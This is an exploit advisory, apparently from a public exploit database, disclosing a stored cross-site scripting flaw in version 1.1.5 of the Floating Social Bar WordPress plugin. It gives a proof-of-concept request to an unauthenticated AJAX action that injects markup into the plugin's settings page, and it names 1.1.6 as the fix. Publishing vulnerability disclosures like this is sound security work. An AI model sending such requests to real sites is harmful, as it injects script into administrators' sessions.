# Exploit Title: Floating Social Bar 1.1.5 XSS # Date: 09-01-2015 # Software Link: https://wordpress.org/plugins/floating-social-bar/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # Category: webapps 1. Description Everyone can access save_order(). File: floating-social-bar\class-floating-social-bar.php add_action( 'wp_ajax_nopriv_fsb_save_order', array( $this, 'save_order' ) ); $_REQUEST['items'] is not escaped. http://security.szurek.pl/floating-social-bar-115-xss.html 2. Proof of Concept http://wordpress-url/wp-admin/admin-ajax.php?action=fsb_save_order&items[1]="> XSS will be visible for admin: http://wordpress-url/wp-admin/options-general.php?page=floating-social-bar 3. Solution: Update to version 1.1.6